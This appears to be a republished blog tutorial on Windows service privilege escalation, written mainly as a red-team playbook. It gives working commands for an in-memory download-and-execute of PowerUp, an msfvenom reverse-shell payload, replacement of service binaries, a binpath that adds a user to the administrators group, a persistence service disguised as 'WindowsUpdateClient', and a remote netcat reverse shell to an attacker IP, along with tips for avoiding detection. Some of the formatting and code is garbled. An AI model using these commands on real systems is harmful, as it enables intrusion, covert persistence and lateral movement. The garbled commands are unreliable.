Listen to this Post

Introduction:
Windows services, often running with elevated SYSTEM privileges, present a vast and frequently overlooked attack surface for penetration testers and red teamers. A misconfigured service binary path or weak permissions can instantly grant an attacker the highest level of access on a workstation or server, leading to rapid domain compromise. This deep dive explores the core techniques for identifying and exploiting vulnerable Windows services to escalate privileges and solidify your foothold within a network.
Learning Objectives:
- Master the techniques for enumerating Windows services and identifying common misconfigurations.
- Understand and execute the exploitation of vulnerable service binaries and unquoted service paths.
- Learn post-exploitation tactics, including establishing persistence and lateral movement from a compromised service context.
You Should Know:
1. Enumerating Services with PowerSploit
The first step is to discover services with insecure configurations. PowerSploit’s `PowerUp` module is an invaluable script for automating this reconnaissance.
PS C:> Invoke-AllChecks PS C:> Get-ServiceUnquoted PS C:> Get-ModifiableService
Step-by-step guide:
- Download the PowerSploit repository to your attacker machine and host the `PowerUp.ps1` script on a web server.
- On the target Windows machine, use PowerShell to load and execute the script in memory: `IEX (New-Object Net.WebClient).DownloadString(‘http://
/PowerUp.ps1′)`
3. RunInvoke-AllChecks. This will perform a comprehensive audit and highlight any services with unquoted paths, modifiable binaries, or other weaknesses. - The `Get-ServiceUnquoted` and `Get-ModifiableService` cmdlets can be used for more specific checks. PowerUp will clearly mark findings with `ABUSEABLE` or `SERVICE_START_NAME` fields that indicate a low-privileged user can control them.
2. The Unquoted Service Path Exploit
A service configured with an unquoted path and a space in its file path is vulnerable to hijacking. Windows will search for the executable in each segment of the path before the space.
PS C:> sc qc "VulnerableService" PS C:> sc config "VulnerableService" binpath= "C:\Program Files\Vendor\My Service\wrapper.exe"
Step-by-step guide:
- Discover a service with an unquoted path using
Invoke-AllChecks. The output will show theBINARY_PATH_NAME. - If the path is
C:\Program Files\Vendor\My Service\wrapper.exe, Windows will attempt to run executables in this order:C:\Program.exe,C:\Program Files\Vendor\My.exe,C:\Program Files\Vendor\My Service\wrapper.exe. - Check your permissions on the directories. If you have write access to
C:\Program Files\Vendor\, you can place a malicious executable named `My.exe` there. - Use `sc stop VulnerableService` and `sc start VulnerableService` to restart the service. Windows will find and execute your `My.exe` file with SYSTEM privileges.
3. Exploiting Modifiable Service Binaries
If a user has write permissions over a service’s binary file itself, you can simply replace it with a malicious payload.
PS C:> icacls "C:\Path\To\ServiceBinary.exe" PS C:> copy /y C:\Temp\malicious.exe "C:\Path\To\ServiceBinary.exe" PS C:> sc stop VulnerableService PS C:> sc start VulnerableService
Step-by-step guide:
- After `Invoke-AllChecks` identifies a modifiable service, verify permissions using
icacls. Look for(F),(M), or `(W)` rights assigned to your user or a group likeBUILTIN\Users. - Generate a malicious reverse shell executable, for example, using
msfvenom: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=LPORT=443 -f exe -o malicious.exe`
3. Copy your `malicious.exe` over the legitimate `ServiceBinary.exe`.
- Stop and start the service. When the service starts, it will execute your payload, granting you a reverse shell with the service’s account privileges (often SYSTEM).
4. Windows Service Commands with sc
The `sc` (Service Control) command is a powerful native tool for querying and managing services.
C:> sc query state= all C:> sc qc "spooler" C:> sc config "VulnerableService" binpath= "net localgroup administrators user /add" C:> sc stop "VulnerableService" C:> sc start "VulnerableService"
Step-by-step guide:
- Use `sc query state= all` to list all services on the system.
- To inspect a specific service’s configuration, use
sc qc "ServiceName". Pay close attention to the `BINARY_PATH_NAME` andSERVICE_START_NAME. - If you have the required permissions, you can reconfigure a service’s binary path. A classic technique is to set the `binpath` to a command that adds your user to the local administrators group.
- After configuring the service, stop and start it. The command in the `binpath` will execute. Remember to reset the `binpath` afterward if you wish to avoid detection and maintain stability.
5. Persistence via Custom Service Creation
Once you have administrative access, you can create a new service to maintain persistence.
C:> sc create "WindowsUpdateClient" binpath= "C:\Windows\Temp\shell.exe" start= auto C:> sc description "WindowsUpdateClient" "Ensures the latest updates are applied." C:> sc start "WindowsUpdateClient"
Step-by-step guide:
- Use the `sc create` command to create a new service. Give it a benign name like
WindowsUpdateClient. - Set the `binpath` to point to your persistent payload. The `start= auto` argument ensures the service starts automatically at boot.
- Optionally, add a believable description using `sc description` to help it blend in.
- Start the service immediately with `sc start` or wait for the next system reboot. Your payload will now run with SYSTEM privileges every time.
6. Lateral Movement with PSExec-like Service Execution
The PsExec tool works by remotely creating and starting a service. You can emulate this with native commands for lateral movement.
C:> sc \TARGET-PC create "PS_SVC" binpath= "cmd.exe /c C:\Temp\nc.exe -e cmd.exe <ATTACKER_IP> 4444" C:> sc \TARGET-PC start "PS_SVC"
Step-by-step guide:
- This requires valid administrator credentials on the target machine.
- Use `sc` with the `\\TARGET-PC` prefix to remotely create a service. The binary path should be a command that executes your payload, such as a netcat reverse shell.
- Once the service is created, use `sc \\TARGET-PC start “PS_SVC”` to trigger the execution on the remote host.
- Remember to clean up by deleting the remote service:
sc \\TARGET-PC delete "PS_SVC".
7. Advanced Reconnaissance with WMI
Windows Management Instrumentation (WMI) provides a more granular interface for service enumeration.
PS C:> Get-WmiObject -Class Win32_Service | Select-Object Name, State, PathName, StartName
PS C:> Get-CimInstance -ClassName Win32_Service | Where-Object {$_.PathName -like " "} | Select-Object Name, PathName
Step-by-step guide:
- Use the `Get-WmiObject` or the newer `Get-CimInstance` PowerShell cmdlets to query the `Win32_Service` class.
- This returns rich data about every service, including the executable path (
PathName) and the account it runs under (StartName). - You can pipe this output to `Where-Object` to filter for specific criteria, such as services with spaces in their `PathName` (potential unquoted path vulnerabilities).
- This method is often less monitored by traditional antivirus solutions compared to direct `sc` queries.
What Undercode Say:
- Low-Hanging Fruit is Everywhere: Service misconfigurations are rampant in corporate environments not strictly enforcing the principle of least privilege. Automated checks with tools like PowerUp are non-negotiable in any assessment.
- Persistence is Key: A compromised service isn’t just a one-off privilege escalation; it’s a golden ticket for persistence. Attackers can maintain access through reboots and credential changes by embedding themselves within the service fabric.
The exploitation of Windows services remains a cornerstone of internal network penetration tests. While the individual techniques are not new, their prevalence makes them a highly reliable vector. Defenders often focus on patching public-facing applications while neglecting internal service hardening. For red teams, this represents a predictable path to domain admin. For blue teams, it underscores the critical need for regular service auditing, strict application of user rights, and robust application whitelisting solutions that extend to the `C:\Windows\System32\` directory to prevent trivial binary replacement attacks.
Prediction:
The future of service-based attacks will pivot towards “living-off-the-land” (LOL) techniques to avoid detection by EDR and antivirus. We will see a rise in the abuse of inherently vulnerable, signed service binaries (a.k.a. LOLBins) through DLL search order hijacking or DCOM manipulation, rather than dropping custom malware. Furthermore, as more services integrate with cloud identity providers like Azure AD, misconfigurations could lead to direct compromise of cloud tenants from an on-premise service account, blurring the traditional perimeter and escalating the impact of these classic attacks.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Eduardo Cochella – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


